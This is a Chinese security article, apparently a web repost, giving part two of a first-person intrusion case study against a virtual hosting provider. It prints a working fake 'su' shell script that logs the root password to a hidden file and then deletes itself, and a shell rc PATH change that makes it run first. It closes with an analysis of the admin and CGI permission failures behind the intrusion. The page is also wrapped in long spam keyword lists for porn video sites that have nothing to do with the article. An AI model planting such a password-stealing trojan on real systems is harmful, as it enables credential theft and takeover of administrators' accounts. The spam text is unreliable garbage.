国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

入侵實例看虛擬主機系統的安全問題(下)
2007-03-02   黑白網絡

由一次入侵實例看虛擬主機系統的安全問題(下)

作者: 更新日期:2004-10-31 類別:網絡安全->安全防御 總瀏覽/今日:332/1

雖然到目前為止,我事實上已經控制了他所有的UNIX主機,也早就有了root權限,但root的密碼我還是不知道,這多少還有點不甘心,怎樣來得到這個密碼呢?窮舉當然是一種,但我就算知道了root密碼,也不想要干什么,何必費這么大的勁,所以我決定來一招偷天換日,雖然sysadm很少會從telnet登錄,但他總要有登陸的時候的,而且一登陸肯定要干root才干的事,他必須使用su命令讓自己成為root,使用su命令的時候當然需要輸入root的密碼,我就可從這點入手,做一個假的su來欺騙,讓他先運行的是我寫的su,把他輸入的密碼保存到一個文件上,即使他的密碼是對的,也給他出錯提示,然后刪除我的這個su,他再次運行的就是真正的su了。所以我用sysadm登錄并寫了如下腳本放在他的用戶目錄下,文件名為su

%vi su

#!/bin/sh

echo -n "Password:"

stty -echo;read PASSWD;stty echo

echo "$PASSWD">>/tmp/.password

echo;

echo "Sorry"

rm -fr ~/su

:wq

%chmod 755 su

為了讓他先運行的是我的su而不是系統的su,還需要改變shell的rc文件,所以打開.cshrc 在

set path = (/sbin /bin /usr/sbin /usr/bin /usr/local/sbin /usr/local/bin $HOME/bin)前面增加一個~,

即讓系統在查找命令時首先查找的是自己的目錄,就是放有我寫的su的目錄,變成這個樣子

set path = (~ /sbin /bin /usr/sbin /usr/bin /usr/local/sbin /usr/local/bin $HOME/bin)

因為不知道他會使用那個shell,所以每一個rc文件都做了同樣的處理......

最后的結果當然是順利的取得了root的密碼,雖然這個方法看起來很簡陋,容易看穿,但事實上卻是非常的隱蔽,在一個UNIX系統上,輸入密碼是連個*都沒有給你回顯的,管理員去su的時候,一般都是有事,需要很快做好,輸錯一次密碼應該還沒感覺過來,就算之后感覺出來了但我這個su又是運行一次就刪掉了,不像什么木馬后門之類,做完事還大摸大樣的留在那里,而rc文件,一般設置完成之后都很少有去看的,大不了我得到密碼之后改回來就是了,基本上并沒有留下什么痕跡。

實際上,這個入侵的實例,由頭到尾都是極為普通的,沒有什么高技術的成分,也沒有現在人家都喜歡用的什么什么漏洞,什么什么溢出,只是由一個普通用戶的弱口令開始,慢慢的發展到了整個主機群被控于一個入侵者的手中,事實上,操作系統和各種相關服務的本身并沒有什么漏洞,問題主要還是發生在CGI程序的編寫,維護中的疏忽,管理員對安全問題不敏感這些上。在系統本身的漏洞少這點上,應該可以看出,主機一開始是由一些資深的工程師配置,之后也會根據以發現的漏洞做修補,但在以后的管理過程中,是由下一層技術人員負責,這一層的人往往技術面不廣,人家叫干什么就干什么,不會有很大的責任壓力,這樣就把安全問題越捅越大。如果沒有那個備份文件,我根本不能了解那個以root運行的apache的cgi-bin的目錄結構和具體的文件名,因為其他人并沒有r權限。第二個就是suid為root的程序的寫法不夠嚴格(以root運行的apache執行CGI時和suid root是差不多一樣的),在一個虛擬主機上,為了讓用戶可以通過web界面來管理,不得不讓apache以root的身份運行,因為用戶的設置,需要改變很多系統的配置文件,如passwd httpd.conf sendmail.cf 等等,雖然apache的suexe提供了比squid更多安全選項如docroot等,但在這里根本就派不上用場。所以這個CGI應該是每一行代碼都要知道自己是以root運行的,絲毫不得有差錯,但遺憾的是,我見到的大多數服務商的這種CGI都忘記了自己是誰,其寫法和普通的CGI類似,創建的文件大多是設置為666,777,而程序本身的屬性為755,事實上,當apache加入suexec這個功能后,CGI程序本身設置為700,其他文件為400就可以了,可以做到除了自己,任何人不可以讀。如果沒有這個屬性的問題,在上面的實例中,我也不可能在cgi-bin下面創建文件,讓apache去運行,也就無法改變主業,復制文件,修改程序。正是這一步,把整個系統推向了被毀滅的邊緣。第三個問題就老生常談了,人本身的安全意識問題,在幾個服務商的主機上都發現了,同一個服務商,它的結構一樣的不同的主機,某些目錄的權限也不一樣,這個很明顯是在日常的維護中改變的。在維護過程中,對一些微妙的東西不注意,往往也是危險發生的原因,比如那個su,就這樣讓我把root密碼給偷了去。而上面提及的問題,到頭來也是體現在這個問題上,安全似乎沒有大小之分,一個大的遠程溢出可以讓入侵者得到root,但只是一些小小疏忽也可以讓入侵者得到root,但大家往往都把注意力集中在一些系統漏洞的修補上,卻忽視了某些"小問題"。

在目前的技術水平上實現的虛擬主機,這些問題的出現應該說是在所難免的,因為這涉及到了服務商的整個員工隊伍的素質問題,在沒有更好的虛擬主機的實現方法之前,如果從技術方面考慮,我覺得應該在權限方面多下功夫,比如用程序隔一定時間(如一小時)檢查各個重要的目錄、文件是否有被修改,用編譯的程序來代替腳本類型的程序等等,說下去又一長篇大論,本人知識水平有限,為了避免在各位高人面前班門弄斧,就此打住。

熱詞搜索:

上一篇:入侵實例看虛擬主機系統的安全問題(上)
下一篇:LINUX中的郵件安全問題

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
久久精品视频一区二区| 久久综合国产精品| 久久aⅴ国产欧美74aaa| 亚洲超碰97人人做人人爱| 国产日韩av一区| 精品久久人人做人人爽| 7777精品伊人久久久大香线蕉| 精品无人码麻豆乱码1区2区| 成人国产精品免费网站| 国产一区二区三区免费播放| 午夜影院在线观看欧美| 亚洲综合小说图片| 亚洲一区二区欧美激情| 综合在线观看色| 国产精品高潮呻吟久久| 中文字幕亚洲一区二区va在线| 精品国产第一区二区三区观看体验| 欧美一区在线视频| 日韩精品一区二区三区视频| 91精品福利在线一区二区三区 | 亚洲国产wwwccc36天堂| 亚洲一区在线播放| 欧美aa在线视频| 韩日av一区二区| 国产精品一区二区黑丝| 97久久超碰国产精品| 一本大道久久a久久综合婷婷| 欧美亚洲禁片免费| 日韩精品资源二区在线| 国产欧美日韩视频一区二区| 亚洲国产精品t66y| 亚洲综合一区二区| 乱一区二区av| eeuss鲁一区二区三区| 欧美少妇性性性| 精品日韩在线观看| 伊人开心综合网| 久久精品国产99久久6| 99视频精品在线| 日韩免费在线观看| 亚洲国产综合在线| 久久99国内精品| 91色婷婷久久久久合中文| 日韩一卡二卡三卡四卡| 1区2区3区国产精品| 久久99精品国产.久久久久久| 色综合一个色综合亚洲| 欧美一级免费观看| 亚洲自拍偷拍图区| 国产激情视频一区二区三区欧美 | 亚洲人成精品久久久久久| 亚洲图片欧美综合| 91在线观看下载| 日本一区二区免费在线| 老鸭窝一区二区久久精品| 欧美色图天堂网| 一区二区三区精品视频| 成人中文字幕合集| 精品日韩99亚洲| 精品一区二区在线免费观看| 在线观看国产91| 一区二区三区美女| 色婷婷久久99综合精品jk白丝| 国产精品色在线| 成人激情av网| 亚洲视频一区在线观看| 91小视频在线| 午夜视频在线观看一区二区三区| 一本大道av伊人久久综合| 最新国产成人在线观看| 91色porny蝌蚪| 亚洲一区中文在线| 欧美日韩三级视频| 麻豆精品一区二区综合av| 91精品国产品国语在线不卡| 亚洲一区视频在线| 日韩亚洲电影在线| 国内久久精品视频| 亚洲欧美一区二区在线观看| 色菇凉天天综合网| 日本sm残虐另类| 欧美激情一区二区| 欧美日韩黄视频| 久久se这里有精品| 一区精品在线播放| 日韩视频免费直播| 不卡一区二区三区四区| 亚洲自拍都市欧美小说| 久久久久久99久久久精品网站| 成a人片国产精品| 日本特黄久久久高潮| 国产精品天美传媒| 91麻豆精品国产自产在线| 国产麻豆日韩欧美久久| 亚洲一区二区三区视频在线| 丁香一区二区三区| 午夜国产精品一区| 亚洲免费在线播放| 国产清纯白嫩初高生在线观看91| 欧美日韩中字一区| 91亚洲国产成人精品一区二三| 亚洲v日本v欧美v久久精品| 日本一区二区电影| 久久综合中文字幕| 日韩一级黄色片| 日韩三级视频中文字幕| 欧美体内she精视频| 91视频一区二区三区| 99精品黄色片免费大全| 国产福利视频一区二区三区| 国产精品影视天天线| 免费观看91视频大全| 午夜精品久久久久久久99水蜜桃| 成人免费一区二区三区在线观看 | 亚洲免费观看高清在线观看| 日韩精品一区二区三区视频在线观看| 欧美日韩另类一区| 欧美日韩免费在线视频| 欧美日韩一本到| 欧美巨大另类极品videosbest| 欧美色倩网站大全免费| 欧美亚洲国产怡红院影院| 91久久香蕉国产日韩欧美9色| 色激情天天射综合网| 欧美日韩美女一区二区| 亚洲欧美一区二区三区极速播放 | 国产激情一区二区三区四区| 国产不卡一区视频| av中文字幕一区| 欧美精品vⅰdeose4hd| 日韩欧美电影在线| 久久女同性恋中文字幕| 国产精品国产三级国产专播品爱网 | 黄色小说综合网站| 国产成人8x视频一区二区| 成av人片一区二区| 欧美日韩免费观看一区三区| 欧美草草影院在线视频| 国产精品久久久久久久久免费相片| 中文成人综合网| 亚洲超碰精品一区二区| 高清久久久久久| 日韩精品中文字幕在线一区| 久久久久久久一区| 亚洲线精品一区二区三区八戒| 蜜桃久久av一区| 91久久精品日日躁夜夜躁欧美| 欧美v亚洲v综合ⅴ国产v| 亚洲天堂av老司机| 国内一区二区视频| 欧美精品乱码久久久久久按摩| 国产欧美1区2区3区| 天天做天天摸天天爽国产一区| 国产成人在线视频免费播放| 在线观看国产91| 欧美国产精品一区二区| 欧美bbbbb| 在线综合亚洲欧美在线视频| 亚洲三级在线看| 成人免费毛片a| 中文av字幕一区| 成人综合婷婷国产精品久久蜜臀| 7777精品伊人久久久大香线蕉超级流畅 | 欧美唯美清纯偷拍| 亚洲在线观看免费| 99国产精品久久久久| 亚洲国产精品精华液ab| 国产成人小视频| 亚洲国产精品99久久久久久久久| 精品一区二区三区香蕉蜜桃| 欧美理论电影在线| 日本va欧美va精品发布| 日韩欧美国产精品| 国产毛片精品视频| 国产亚洲一二三区| 国产一区二区主播在线| 久久亚洲精精品中文字幕早川悠里| 麻豆精品在线看| 中文字幕一区二区三区精华液| 99精品欧美一区| 一区二区三区小说| 欧美日韩国产在线播放网站| 午夜不卡在线视频| 日韩精品综合一本久道在线视频| 极品少妇xxxx精品少妇| 国产精品卡一卡二| 67194成人在线观看| 激情深爱一区二区| 一卡二卡欧美日韩| 日韩三级.com| 成人av在线资源| 日韩电影在线一区二区三区| 精品福利一区二区三区免费视频| 成人精品gif动图一区| 亚洲va欧美va人人爽午夜| 精品99999| 制服丝袜亚洲色图| 91亚洲国产成人精品一区二三| 奇米影视在线99精品| 伊人婷婷欧美激情|